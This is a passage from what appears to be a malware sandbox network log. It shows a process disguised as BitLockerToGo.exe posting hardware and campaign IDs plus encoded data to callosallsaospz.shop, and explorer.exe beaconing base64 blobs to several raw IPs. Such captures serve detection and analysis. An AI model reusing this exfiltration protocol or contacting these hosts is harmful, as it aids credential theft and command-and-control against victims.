2024-07-27 05:44:28 UTC	4096	IN	Data Raw: 35 b9 3d ae e8 36 9e 93 e1 f3 a5 4d 25 b8 bc 10 7d bc da a6 8e cf e2 62 c4 0a f4 79 8a 7b 51 7d ed eb f2 55 1c b1 f3 76 9e 53 a7 e8 e0 11 ac 13 e5 d5 36 8d 68 f2 bf 40 59 40 cd 4a 8e 99 f1 88 bb dc e9 f2 85 c0 b6 da da 16 e9 d8 31 08 d4 60 b8 95 27 1d 6d cb d6 09 9d 7d 6a 22 db 89 6d 03 1b e8 b2 16 e8 98 2c 87 c0 49 9d e5 46 55 11 c1 c1 b0 38 ab 79 86 66 3d a5 db 6d 9c f9 b9 87 77 b6 a3 45 7b 5d cb b8 0c 53 11 a5 ba d0 6a a1 65 25 e5 31 e1 1c b5 52 55 5a 2b 0a da db d2 72 e1 6e 5b 74 a1 9b 77 1d da 35 e7 57 8e 16 36 55 b0 7d 7b 4d fc d4 5f fe 6c db 28 d8 b0 d0 7b d3 0a 24 6a c0 9d 72 21 c4 a0 bb e2 41 50 4a b6 0e e0 db a4 fc 94 2a 27 9f fd 62 72 6b 75 b8 54 bb eb 0e b4 ab a9 b6 aa 42 8a 50 77 c5 a2 fc 9a 38 89 99 68 9a e8 b0 23 f9 ad c2 a9 41 50 81 e4 e5 Data Ascii: 5=6M%}by{Q}UvS6h@Y@J1`'m}j"m,IFU8yf=mwE{]Sje%1RUZ+rn[tw5W6U}{M_l({$jr!APJ*'brkuTBPw8h#AP
2024-07-27 05:44:28 UTC	4096	IN	Data Raw: b5 f0 9a a4 71 b4 47 db 05 8d 76 04 b0 1e 89 34 33 9d 71 eb 4d 47 10 37 d1 11 81 44 b3 39 28 51 70 a5 44 0e 0a 37 5a d7 44 78 03 61 1a 21 0b fb 62 85 64 24 f3 1c 64 93 c2 67 2a 48 a4 18 ef e9 f8 f1 5a 41 11 d3 4d 71 4f f8 3c 89 45 bb 37 6b d5 d3 c1 f8 09 0a db 78 17 8b e8 10 f2 4d c6 fb 97 29 a7 6f 33 d2 d2 8d a9 45 d9 72 fe 52 7b 70 eb 2c e9 fb a6 d9 f7 2d 7c 5d a3 94 fd 14 5f 42 a7 31 f1 52 e5 db d4 35 8f 01 39 8a 11 ef 18 9e 0c a7 ab e0 ca 83 62 8a 6a 7b 60 d1 dd 11 b9 4e ee 2b e8 79 72 41 e4 de 95 4c 52 84 0f 5e 77 74 d2 f0 58 5e 39 20 b3 55 7e f1 4b c3 04 ef f8 8f 09 e0 40 31 08 0f 59 f9 df ed 51 83 59 78 48 0c 2e 40 e7 60 eb 97 5f c9 c4 c6 d9 46 c3 6d 1f 50 2f 93 f9 72 7d 42 57 96 1b c0 ea 41 85 c9 f3 36 2a 7e 79 bb e1 19 22 92 47 86 81 ce a6 fa 63 Data Ascii: qGv43qMG7D9(QpD7ZDxa!bd$dgHZAMqO<E7kxM)o3ErR{p,-\|]_B1R59bj{`N+yrALR^wtX^9 U~K@1YQYxH.@`_FmP/r}BWA6~y"Gc
2024-07-27 05:44:28 UTC	4096	IN	Data Raw: 46 94 44 d4 1a bd 3d 25 28 41 89 70 53 b6 3c 25 25 87 79 91 ae c9 a4 55 0a 23 67 fa 87 63 75 7b 9d 41 56 7d 7f 0e 4e 89 bb be d7 da 36 be 6b c3 a1 06 8d f0 93 52 17 4d 10 c9 99 ea 02 e6 50 f9 e5 21 9e 7a ef 7b 14 85 df e2 43 42 e9 89 3e ce 49 11 a4 e9 1a 9b e0 63 7f cf 38 7b c0 30 0b 4d fc c8 36 a5 a1 f7 ef 19 2e 9b c0 9b d0 2a e1 a0 99 2a 24 92 2a 4b b8 b9 af b7 fe 77 cf e1 c2 cc 81 d8 2c 3a b0 ae 03 5d 77 b6 cb 0c f1 65 48 4b ba 80 14 71 91 ae d1 00 d0 b1 96 cb 3a a3 5f 8f 40 b8 5c 01 01 50 23 32 f9 af 96 a9 bb de 1a 18 32 4e 69 af 4a ea 2f 61 0f 18 82 76 e8 02 27 0f a1 33 99 cf e2 7a c7 72 82 55 fc 2d 8a 31 61 85 7c 4f 50 24 40 e5 8f 80 8f b9 e4 4c 85 3e 7f fc 3c df 03 e3 72 0e c4 81 8e b1 72 e3 f8 be 34 52 88 59 35 e9 d8 eb a0 0d 01 54 78 c8 02 bd 1c Data Ascii: FD=%(ApS<%%yU#gcu{AV}N6kRMP!z{CB>Ic8{0M6.*$Kw,:]weHKq:_@\P#22NiJ/av'3zrU-1a\|OP$@L><rr4RY5Tx

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	62283	188.114.97.3	443	1988	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:28 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18158 Host: callosallsaospz.shop
2024-07-27 05:44:28 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 41 30 37 31 41 33 36 44 41 34 37 32 41 41 31 38 43 30 45 35 46 37 38 34 45 42 46 38 35 36 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"AA071A36DA472AA18C0E5F784EBF856B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
2024-07-27 05:44:28 UTC	2827	OUT	Data Raw: 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af 16 Data Ascii: MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X\|mn^IUm'3R?l
2024-07-27 05:44:28 UTC	808	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 05:44:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cuff47fg94qrlmok8i2ccl86r2; expires=Tue, 19-Nov-2024 23:31:07 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DVUnrhJIleATcdZvtWs2H1JqEL48ORndlgnnf3M5kM79vX1dHOA8fjY18A8PEUu0%2BdNiuVsVF%2BDi1Vt9e37xilslhGao4C6%2BaGrJXLuqgQLFQbST8fXXzoMcoU1My6H0064HjoiFVA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9a515919f95e62-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 05:44:28 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-27 05:44:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	62284	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:29 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:44:29 UTC	1267	OUT	Data Raw: 67 65 58 67 48 47 4f 61 75 6b 6e 41 55 31 30 66 71 79 47 4c 4d 62 7a 4d 74 4a 72 4f 4a 46 73 4d 48 78 4e 55 53 48 2b 75 61 71 6a 35 78 51 66 4d 42 73 43 46 2f 55 77 72 64 74 43 49 62 72 37 33 73 71 55 72 34 79 4e 73 75 2f 4e 51 6c 62 79 6f 6d 76 4f 44 55 39 33 6b 4a 48 54 74 6a 54 78 56 44 55 5a 61 4c 4a 78 65 54 63 61 6c 35 47 44 6c 7a 4e 4c 69 41 46 66 57 2f 76 76 38 4c 61 63 6d 43 4e 51 57 39 50 30 65 53 34 2b 35 66 77 4e 39 39 55 35 66 71 34 61 52 6a 63 56 47 57 4f 66 5a 58 4e 76 2b 4d 63 77 4b 71 39 58 4b 5a 6b 59 77 38 47 48 42 33 6e 43 4e 74 2f 7a 4d 6b 53 2b 4e 49 5a 52 41 6b 2b 66 4a 37 36 6c 54 76 56 67 4d 65 74 75 42 74 49 46 77 34 50 48 50 50 6f 47 64 63 50 44 45 56 38 5a 34 33 65 42 52 56 68 36 75 53 64 72 69 30 56 53 64 43 43 4d 68 66 75 69 Data Ascii: geXgHGOauknAU10fqyGLMbzMtJrOJFsMHxNUSH+uaqj5xQfMBsCF/UwrdtCIbr73sqUr4yNsu/NQlbyomvODU93kJHTtjTxVDUZaLJxeTcal5GDlzNLiAFfW/vv8LacmCNQW9P0eS4+5fwN99U5fq4aRjcVGWOfZXNv+McwKq9XKZkYw8GHB3nCNt/zMkS+NIZRAk+fJ76lTvVgMetuBtIFw4PHPPoGdcPDEV8Z43eBRVh6uSdri0VSdCCMhfui
2024-07-27 05:44:30 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:44:30 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:44:30 UTC	685	IN	Data Raw: 67 35 5a 4d 35 2f 73 38 2f 62 42 70 48 75 30 77 78 44 6b 73 67 6f 53 36 48 2f 42 43 62 49 6f 56 76 51 65 6e 37 74 56 46 6e 75 6a 6e 47 66 54 6c 52 44 46 4b 56 64 46 46 4a 4b 4d 42 79 6a 37 54 36 6d 65 55 57 37 4a 2b 79 34 34 72 32 6a 4c 33 7a 66 49 4a 4c 56 4c 58 74 67 33 49 42 46 65 54 30 7a 4a 49 75 48 68 4d 68 4b 35 6d 32 44 6c 62 62 50 42 4f 39 42 53 4c 44 39 30 56 68 37 79 33 56 71 64 45 47 55 59 35 54 77 67 6c 42 33 62 37 55 48 68 39 30 65 2f 39 30 69 6f 64 6a 4d 33 77 49 59 74 2b 39 47 53 4b 57 2f 68 31 6f 6b 72 39 4b 53 68 79 4e 56 71 56 75 4a 6d 65 33 65 72 58 52 30 45 47 39 73 4d 6a 73 79 62 6d 66 74 76 30 45 50 36 2b 36 79 68 4c 42 37 38 4b 44 7a 70 77 4e 7a 76 4c 6f 6b 6c 53 6c 56 54 78 4c 74 55 72 61 53 47 39 52 2f 44 55 31 7a 32 49 70 4f 6b Data Ascii: g5ZM5/s8/bBpHu0wxDksgoS6H/BCbIoVvQen7tVFnujnGfTlRDFKVdFFJKMByj7T6meUW7J+y44r2jL3zfIJLVLXtg3IBFeT0zJIuHhMhK5m2DlbbPBO9BSLD90Vh7y3VqdEGUY5TwglB3b7UHh90e/90iodjM3wIYt+9GSKW/h1okr9KShyNVqVuJme3erXR0EG9sMjsybmftv0EP6+6yhLB78KDzpwNzvLoklSlVTxLtUraSG9R/DU1z2IpOk

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	62285	188.114.97.3	443	1988	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:29 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8779 Host: callosallsaospz.shop
2024-07-27 05:44:29 UTC	8779	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 41 30 37 31 41 33 36 44 41 34 37 32 41 41 31 38 43 30 45 35 46 37 38 34 45 42 46 38 35 36 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"AA071A36DA472AA18C0E5F784EBF856B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
2024-07-27 05:44:30 UTC	812	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 05:44:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gmetsvj0ed2qhk60slco9m8avs; expires=Tue, 19-Nov-2024 23:31:09 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3bB8luengpVHbDR6%2Bg9e%2Fbpb8p%2BRtzbpPATF5nRSHrYrwbFgAMtSin1kPKTNUCnDDA9ktCPu1SdI8KlsXTT63QBFaBcr6CB2ZOr6qkBcAGWafDsz0pA%2FOb6wRcvZpvP41ErjG0%2F0Zw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9a51628f248c41-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 05:44:30 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-27 05:44:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	62286	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:31 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:44:31 UTC	1267	OUT	Data Raw: 65 49 50 78 34 79 72 31 75 69 76 64 6a 6d 48 4c 48 69 69 58 41 69 47 44 71 39 4c 4d 47 50 77 53 54 53 32 46 70 38 41 31 36 41 72 35 33 56 31 47 31 65 57 67 7a 47 45 39 67 43 43 4e 59 2f 6d 44 56 6a 74 55 5a 6b 71 58 72 63 66 69 31 39 51 67 45 36 44 63 43 33 43 46 7a 38 36 30 67 58 6e 48 76 44 7a 6e 53 61 63 56 79 4d 6e 77 36 35 64 74 71 5a 51 39 2b 56 47 36 53 31 44 78 4b 74 54 52 2b 61 6b 68 55 61 4e 76 37 71 34 71 56 59 49 78 39 48 2b 48 50 79 4d 38 63 78 41 30 6c 2b 34 65 34 4a 50 33 41 6c 78 4a 4c 55 63 71 78 6a 49 64 4e 56 78 51 2f 55 70 6a 62 58 53 70 66 65 6b 2b 2b 4b 4b 32 56 75 75 78 45 33 30 53 71 2b 36 6a 71 71 6c 51 4e 43 67 55 69 68 61 4e 48 34 77 4f 7a 6e 56 72 59 4b 34 4b 42 64 51 52 6b 57 54 52 48 2f 70 64 4f 50 7a 42 71 39 6c 39 6a 33 30 Data Ascii: eIPx4yr1uivdjmHLHiiXAiGDq9LMGPwSTS2Fp8A16Ar53V1G1eWgzGE9gCCNY/mDVjtUZkqXrcfi19QgE6DcC3CFz860gXnHvDznSacVyMnw65dtqZQ9+VG6S1DxKtTR+akhUaNv7q4qVYIx9H+HPyM8cxA0l+4e4JP3AlxJLUcqxjIdNVxQ/UpjbXSpfek++KK2VuuxE30Sq+6jqqlQNCgUihaNH4wOznVrYK4KBdQRkWTRH/pdOPzBq9l9j30
2024-07-27 05:44:32 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:44:32 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:44:32 UTC	685	IN	Data Raw: 6f 6e 2f 78 30 76 61 64 71 58 38 2b 30 67 72 34 71 4d 65 34 73 5a 47 41 49 6b 50 53 49 74 73 4e 55 67 46 6d 56 6e 56 51 54 35 34 31 47 76 6a 57 76 2b 30 47 59 7a 58 37 2f 4c 38 68 4f 2f 43 2b 68 6c 4e 75 39 34 41 34 36 72 57 71 6e 74 54 6e 6d 7a 4d 53 30 6a 58 66 6a 43 64 56 56 54 4d 4e 6f 43 46 51 72 30 74 57 73 33 79 57 64 4b 39 77 57 55 61 33 4d 76 72 39 44 4c 30 4a 6b 63 34 54 34 56 44 73 54 76 2f 6d 78 44 72 52 36 38 38 38 79 32 74 63 6f 6f 43 65 41 39 6e 38 54 67 6e 46 53 76 6d 31 6e 73 35 45 57 4a 53 58 59 4a 78 45 4c 35 58 76 58 37 56 44 33 71 71 35 39 73 79 79 72 4f 77 59 45 76 35 31 47 4b 65 2b 5a 45 38 53 34 35 65 36 58 65 7a 73 43 35 43 74 49 51 71 41 6a 52 73 59 7a 61 63 44 36 39 70 75 5a 69 4f 79 58 46 68 77 73 64 5a 4d 65 37 79 6b 68 47 76 Data Ascii: on/x0vadqX8+0gr4qMe4sZGAIkPSItsNUgFmVnVQT541GvjWv+0GYzX7/L8hO/C+hlNu94A46rWqntTnmzMS0jXfjCdVVTMNoCFQr0tWs3yWdK9wWUa3Mvr9DL0Jkc4T4VDsTv/mxDrR6888y2tcooCeA9n8TgnFSvm1ns5EWJSXYJxEL5XvX7VD3qq59syyrOwYEv51GKe+ZE8S45e6XezsC5CtIQqAjRsYzacD69puZiOyXFhwsdZMe7ykhGv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	62287	188.114.97.3	443	1988	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:32 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20432 Host: callosallsaospz.shop
2024-07-27 05:44:32 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 41 30 37 31 41 33 36 44 41 34 37 32 41 41 31 38 43 30 45 35 46 37 38 34 45 42 46 38 35 36 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"AA071A36DA472AA18C0E5F784EBF856B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
2024-07-27 05:44:32 UTC	5101	OUT	Data Raw: 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 Data Ascii: `M?lrQMn 64F6(X&7~`aO
2024-07-27 05:44:33 UTC	806	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 05:44:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=daqnmjnj5mvvco185ts11shf61; expires=Tue, 19-Nov-2024 23:31:11 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5EupVSxDES9mGWJztznK9mHKnRH6WnFtwL47jqURtLy4Amdp%2FfwXZ72QXzyRFABFAGBUZK38JkeSmZvz%2FWV4zv45MRWNWX1MCpJesJnqW9aA4dz2sSVwadnJjuBPQpomlTJnFKzTSQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9a51716d53c466-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 05:44:33 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-27 05:44:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	62288	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:33 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:44:33 UTC	1267	OUT	Data Raw: 6f 6b 38 62 46 59 64 30 39 62 42 4c 34 32 52 68 67 6a 31 73 4d 35 2b 2b 56 33 56 4e 67 30 2f 6c 41 6a 45 36 65 47 58 38 65 2b 42 73 75 38 50 64 65 39 77 77 6b 4c 6a 32 78 65 43 63 74 42 30 64 70 37 71 72 42 53 62 71 71 53 58 59 4d 31 71 44 43 6c 74 68 62 50 67 46 4d 77 55 6c 4b 49 6c 75 58 4c 43 4e 6e 2f 61 2b 59 65 71 63 67 43 4b 4c 63 70 75 70 6a 41 75 54 70 64 4c 65 6e 4b 33 57 63 38 79 74 32 50 57 5a 58 72 49 61 51 79 33 54 38 62 4b 64 6f 7a 51 4d 54 2b 51 44 47 4c 59 70 61 56 66 37 6d 41 41 69 37 6c 42 47 51 2b 75 63 41 55 45 63 45 69 2b 6a 2b 4b 30 35 65 69 4b 71 62 35 52 31 74 33 49 6f 73 46 38 67 37 54 6f 41 68 2b 4d 53 6c 73 31 75 6e 4b 45 41 46 66 31 57 72 64 55 32 6f 68 55 54 4e 55 6b 70 52 76 59 76 46 32 59 54 38 68 6c 56 58 6c 44 41 6b 70 43 Data Ascii: ok8bFYd09bBL42Rhgj1sM5++V3VNg0/lAjE6eGX8e+Bsu8Pde9wwkLj2xeCctB0dp7qrBSbqqSXYM1qDClthbPgFMwUlKIluXLCNn/a+YeqcgCKLcpupjAuTpdLenK3Wc8yt2PWZXrIaQy3T8bKdozQMT+QDGLYpaVf7mAAi7lBGQ+ucAUEcEi+j+K05eiKqb5R1t3IosF8g7ToAh+MSls1unKEAFf1WrdU2ohUTNUkpRvYvF2YT8hlVXlDAkpC
2024-07-27 05:44:34 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:44:33 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:44:34 UTC	685	IN	Data Raw: 71 74 77 56 61 48 73 4c 63 49 68 6d 79 50 45 65 35 62 76 46 61 4e 57 6c 4a 4e 71 59 48 44 46 41 56 76 2f 6c 70 62 5a 39 51 76 38 68 67 76 4c 39 52 4a 4f 79 4c 4d 72 2f 2f 66 73 59 4a 45 62 78 63 67 4c 52 4e 53 61 33 39 56 6a 71 51 42 63 4d 32 77 69 4f 6c 6f 58 59 79 36 34 56 74 42 62 2f 4f 37 47 58 4e 4a 6e 70 59 79 52 47 30 32 54 53 5a 4e 47 76 79 41 6f 4d 30 31 6a 57 61 64 70 4e 72 54 33 6a 4a 55 5a 69 48 49 44 47 4e 41 42 74 76 47 70 76 57 41 51 53 65 2b 6d 31 4d 45 43 70 54 47 68 37 70 53 53 31 79 6e 45 4c 64 43 6e 54 65 4d 50 30 56 67 67 44 38 38 78 61 45 7a 37 77 4a 43 4e 76 49 6b 35 56 53 35 62 33 57 56 68 31 52 75 52 79 2b 64 62 49 57 50 31 79 67 50 7a 68 51 69 48 78 46 33 68 37 49 74 35 61 70 6f 66 35 7a 52 57 48 79 42 63 66 59 73 4d 77 70 58 52 Data Ascii: qtwVaHsLcIhmyPEe5bvFaNWlJNqYHDFAVv/lpbZ9Qv8hgvL9RJOyLMr//fsYJEbxcgLRNSa39VjqQBcM2wiOloXYy64VtBb/O7GXNJnpYyRG02TSZNGvyAoM01jWadpNrT3jJUZiHIDGNABtvGpvWAQSe+m1MECpTGh7pSS1ynELdCnTeMP0VggD88xaEz7wJCNvIk5VS5b3WVh1RuRy+dbIWP1ygPzhQiHxF3h7It5apof5zRWHyBcfYsMwpXR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
